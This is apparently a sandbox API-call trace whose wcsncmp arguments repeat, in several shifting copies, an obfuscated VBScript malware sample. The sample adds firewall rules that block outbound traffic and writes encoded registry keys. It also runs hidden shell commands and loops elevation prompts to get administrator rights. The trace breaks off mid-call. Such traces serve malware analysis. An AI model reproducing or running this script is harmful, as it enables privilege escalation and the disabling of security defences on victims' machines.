bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0226.324] wcsncmp (_String1="\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.325] wcsncmp (_String1="Const PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 54 [0226.325] wcsncmp (_String1="onst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98 [0226.325] wcsncmp (_String1="nst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite 